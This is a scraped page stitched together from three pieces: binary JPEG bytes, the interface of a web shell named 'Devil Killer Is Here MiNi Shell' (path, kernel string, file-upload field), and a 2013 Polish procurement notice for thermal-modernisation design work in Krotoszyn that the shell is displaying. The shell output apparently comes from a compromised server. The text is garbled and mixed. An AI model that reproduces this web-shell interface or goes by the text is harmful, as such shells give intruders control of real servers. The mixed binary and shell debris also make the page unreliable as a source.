JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130703/132217-N-2013.html

<p class="kh_header"><b>Krotoszyn: Opracowanie dokumentacji projektowych dla zadania pn. Termomodernizacja obiektów użyteczności publicznej w gminie Krotoszyn</b><br>
<b>Numer ogłoszenia: 132217 - 2013; data zamieszczenia: 03.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Krotoszyn , ul. Hugona Kołłątaja 7, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7227454, faks 062 7228251.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowych dla zadania pn. Termomodernizacja obiektów użyteczności publicznej w gminie Krotoszyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi opracowanie dokumentacji projektowych dla zadania pn.: Termomodernizacja obiektów użyteczności publicznej w gminie Krotoszyn. 
W zakres zamówienia wchodzi wykonanie kompleksowej wielobranżowej dokumentacji budowlanej i wykonawczej, uzyskanie pozwolenia na budowę/zgłoszenia oraz opracowanie audytu energetycznego i efektu ekologicznego dla budynków:Zespołu Szkół Nr 1 z Oddziałami Integracyjnymi w Krotoszynie, Szkoły Podstawowej w Biadkach, Przedszkola Nr 2 w Krotoszynie,  Przedszkola Nr 5 w Krotoszynie, Wiejskiego Domu Kultury w Różopolu, Wiejskiego Domu Kultury w Wielowsi. 
Szczegółowy opis przedmiotu zamówienia stanowi załącznik  A do SIWZ.
Termin dostarczenia Zamawiającemu kompletnej dokumentacji oraz złożenia wniosku o pozwolenie na budowę/zgłoszenie zamiaru wykonania robót budowlanych - 15 stycznia 2014 r. Termin dostarczenia Zamawiającemu zatwierdzonej przez organ dokumentacji projektowej wraz z pozwoleniem na budowę (jeśli dotyczy) - 15 marca 2014 r.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w oparciu o art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych do wysokości 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona - przez cały okres związania ofertą wadium w wysokości : 
Cz. I. -   1.500,00 zł, słownie: jedentysiącpięćsetzłotych; 
Cz. II -  1.200,00 zł, słownie: jedentysiącdwieściezłotych;
Cz. III - 1.200,00 zł, słownie: jedentysiącdwieściezłotych;
Cz. IV - 1.200,00 zł, słownie: jedentysiącdwieściezłotych;
Cz. V -  1.200,00 zł, słownie: jedentysiącdwieściezłotych;
Cz. VI - 1.200,00 zł, słownie: jedentysiącdwieściezłotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada wiedzę i doświadczenie tj. wskaże wykonanie w ciągu 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
Cz. I - dot.  budynku Zespołu Szkół Nr 1 z Oddziałami Integracyjnymi w Krotoszynie:
minimum 2 wielobranżowych dokumentacji projektowych obiektów kubaturowych o wartości zaprojektowanych robót nie mniejszej niż 500.000,00 PLN brutto (wg kosztorysu inwestorskiego) każde zadanie 
Cz. II - dot. budynku Szkoły Podstawowej w Biadkach:
minimum 2 wielobranżowych dokumentacji projektowych obiektów kubaturowych o wartości zaprojektowanych robót nie mniejszej niż 300.000,00 PLN brutto (wg kosztorysu inwestorskiego) każde zadanie 
Cz. III  - dot. budynku Przedszkola Nr 2 w Krotoszynie:
minimum 2 wielobranżowych dokumentacji projektowych obiektów kubaturowych o wartości zaprojektowanych robót nie mniejszej niż 500.000,00 PLN brutto (wg kosztorysu inwestorskiego) każde zadanie 
Cz. IV -  dot. budynku Przedszkola Nr 5 w Krotoszynie: 
minimum 2 wielobranżowych dokumentacji projektowych obiektów kubaturowych o wartości zaprojektowanych robót nie mniejszej niż 400.000,00 PLN brutto (wg kosztorysu inwestorskiego) każde zadanie.
Cz. V -  dot. budynku Wiejskiego Domu Kultury w Różopolu: 
minimum 2 wielobranżowych dokumentacji projektowych obiektów kubaturowych o wartości zaprojektowanych robót nie mniejszej niż 500.000,00 PLN brutto (wg kosztorysu inwestorskiego) każde zadanie.
Cz. VI -  dot. budynku Wiejskiego Domu Kultury w Wielowsi: 
minimum 2 wielobranżowych dokumentacji projektowych obiektów kubaturowych o wartości zaprojektowanych robót nie mniejszej niż 500.000,00 PLN brutto (wg kosztorysu inwestorskiego) każde zadanie.

Wykonawca spełni warunek, jeżeli przedstawi wykaz głównych usług, w tym w/wym. dla danej części oraz przedłoży dowody potwierdzające czy zostały wykonane należycie.
Dowodami, o których mowa wyżej są poświadczenia wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. W miejsce poświadczeń Wykonawca może złożyć dokumenty potwierdzające należyte wykonanie usług (referencje lub inny dokument). 

Ocena spełniania warunku będzie dokonywana w oparciu o kompletność i prawidłowość złożonych oświadczeń i dokumentów określonych w SIWZ (pkt. IX.B 1 i 2 oraz załącznik nr 2a-f i 2.1a-f) i zostanie dokonana na podstawie treści tych dokumentów według metody : spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj. min. następującymi osobami /Dotyczy Cz. od I do VI/ :

1.Projektant - uprawnienia projektowe w specjalności konstrukcyjno - budowlanej bez ograniczeń wydane zgodnie z przepisami ustawy z dn. 07.07.1994 r. - Prawo budowlane  (Dz.U.2010.243.1623 j.t.) i Rozporządzenia Ministra Transportu i Budownictwa z dn. 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U.2006.83.578) lub im odpowiadające uprawnienia budowlane w zakresie objętym przedmiotowym projektem, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
2.Projektant - uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń wydane zgodnie z przepisami ustawy z dn. 07.07.1994 r. - Prawo budowlane (Dz.U.2010.243.1623 j.t.) i Rozporządzenia Ministra Transportu i Budownictwa z dn. 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U.2006.83.578) lub im odpowiadające uprawnienia budowlane w zakresie objętym przedmiotowym projektem, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
3.Projektant - uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń wydane zgodnie z przepisami ustawy z dn. 07.07.1994 r. - Prawo budowlane (Dz.U.2010.243.1623 j.t.) i Rozporządzenia Ministra Transportu i Budownictwa z dn. 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U.2006.83.578) lub im odpowiadające uprawnienia budowlane w zakresie objętym przedmiotowym projektem, które zostały wydane na podstawie wcześniej obowiązujących przepisów.

Wykonawca spełni warunek, jeżeli dysponuje/będzie dysponował w/w osobami, oraz przedłoży oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

Ocena spełniania warunku będzie dokonywana w oparciu o kompletność i prawidłowość złożonych oświadczeń i dokumentów określonych w SIWZ ( pkt. IX.B 3 i 4 oraz załącznik nr 3 i 4) i zostanie dokonana na podstawie treści tych dokumentów według metody : spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej, tj. wykaże posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną sumę ubezpieczenia 25.000,00 PLN odrębnie dla każdej z części zamówienia ( Cz. od I do VI).
Wykonawca spełni warunek, jeżeli jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na w/w kwotę.
UWAGA!  W przypadku składania oferty na więcej części zamówienia, Wykonawca winien spełnić w/w warunek na łączną kwotę.
Ocena spełniania warunku będzie dokonywana w oparciu o kompletność i prawidłowość złożonych oświadczeń i dokumentów określonych w SIWZ ( pkt. IX.B 5 oraz załącznik nr 5) i zostanie dokonana na podstawie treści tych dokumentów według metody : spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik : pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy
2. W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa do reprezentowania Wykonawców. 
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty o których mowa w pkt III.4.2 niniejszego ogłoszenia każdy z Wykonawców składa osobno.
4. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP - w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - załączone do oferty w oryginale.
5.W przypadku składania ofert przez Wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych uprawnień budowlanych, uzyskane w innych państwach na zasadach określonych w art. 12a ustawy z dnia 07 lipca 1994 r. Prawo budowlane (Dz.U. z 2010 r. Nr 243, poz. 1623) z uwzględnieniem postanowień ustawy z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz.U. z 2008 r. Nr 63 poz. 394 ze zm.).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy PZP Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku:
a)wystąpienie awarii niezawinionej czynnościami lub niewynikającej z zaniechania czynności, do których Wykonawca był zobowiązany - Zamawiający dopuszcza możliwość zmiany terminu realizacji umowy.
b)działania osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia, Zamawiający dopuszcza możliwość zmiany terminu realizacji umowy.
c)wystąpienie nieprzewidzianych okoliczności formalno-prawnych mających wpływ na termin wykonania przedmiotu zamówienia
d)wystąpienia nieprzewidzianych prac, mających wpływ na prawidłowe wykonanie przedmiotu umowy, których realizacja powoduje konieczność przedłużenia terminu umowy podstawowej, Zamawiający dopuszcza możliwość przedłużenia tego terminu, o okres niezbędny do realizacji w/w prac,
e)wystąpienia  ewentualnych prac zamiennych lub niewykonanych Zamawiający dopuszcza możliwość zmiany terminu realizacji umowy.
f)zmiany kluczowego personelu wykonawcy,  spełniającego wymagania zawarte w siwz  /po uzgodnieniu z Zamawiającym/;
g)gdy niedotrzymanie pierwotnego terminu realizacji umowy spowodowane jest przez władze publiczne - Zamawiający dopuszcza możliwość zmiany terminu realizacji umowy.
h)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Krotoszynie, Zespół Zamówień Publicznych, ul. Kołłątaja 7, 63-700 Krotoszyn,   pok. 63.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2013 godzina 10:30, miejsce: Urząd Miejski w Krotoszynie, ul. Kołłątaja 7, 63-700 Krotoszyn, punkt informacyjny -parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji budowlanej i wykonawczej, uzyskanie pozwolenia na budowę/zgłoszenia oraz opracowanie audytu energetycznego i efektu ekologicznego budynków Zespołu Szkół Nr 1 z Oddziałami Integracyjnymi w Krotoszynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólny zakres prac projektowych: 1.	Roboty termomodernizacyjne:
-  docieplenie ścian zewnętrznych, ścian fundamentowych i stropodachów,
-  wymiana  stolarki okiennej i drzwiowej, 
-  modernizacja systemu grzewczego - wymiana wewnętrznej,
   instalacji c.o. wraz z dostosowaniem instalacji kotłowni,
-  wentylacja budynków,
-  roboty towarzyszące powyższym.
2.Roboty modernizacyjne i remontowe w zakresie wszystkich branż zgodnie z wymogami użytkownika obiektu oraz wszelkie inne roboty niezbędne do wykonania tego zakresu
3.Dostosowanie systemu wentylacji do wymogów obowiązujących przepisów
4.Dostosowanie obiektu do obowiązujących przepisów przeciwpożarowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji budowlanej i wykonawczej, uzyskanie pozwolenia na budowę/zgłoszenia oraz opracowanie audytu energetycznego i efektu ekologicznego budynku Szkoły Podstawowej w Biadkach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólny zakres prac projektowych: 1. Roboty termomodernizacyjne:
-  docieplenie ścian zewnętrznych, ścian fundamentowych i stropodachów,
-  wymiana  stolarki okiennej i drzwiowej, 
-  modernizacja systemu grzewczego - wymiana wewnętrznej,
   instalacji c.o. wraz z dostosowaniem instalacji kotłowni,
-  wentylacja budynku,
-  roboty towarzyszące powyższym.
2.Roboty modernizacyjne i remontowe w zakresie wszystkich branż zgodnie z wymogami użytkownika obiektu oraz wszelkie inne roboty niezbędne do wykonania tego zakresu. 
3.Dostosowanie systemu wentylacji do wymogów obowiązujących przepisów.
4.Dostosowanie obiektu do obowiązujących przepisów przeciwpożarowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji budowlanej i wykonawczej, uzyskanie pozwolenia na budowę/zgłoszenia oraz opracowanie audytu energetycznego i efektu ekologicznego budynku Przedszkola Nr 2 w Krotoszynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólny zakres prac projektowych: 1. Roboty termomodernizacyjne:
-  docieplenie ścian zewnętrznych, ścian fundamentowych i dachu,
-  wymiana  stolarki okiennej i drzwiowej, 
-  modernizacja systemu grzewczego - wymiana wewnętrznej,
   instalacji c.o. wraz z dostosowaniem instalacji kotłowni,
-  wentylacja budynku,
-  roboty towarzyszące powyższym.
2.Roboty modernizacyjne i remontowe w zakresie wszystkich branż zgodnie z wymogami użytkownika obiektu oraz wszelkie inne roboty niezbędne do wykonania tego zakresu. 
3.Dostosowanie systemu wentylacji do wymogów obowiązujących przepisów
4.Dostosowanie obiektu do obowiązujących przepisów przeciwpożarowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
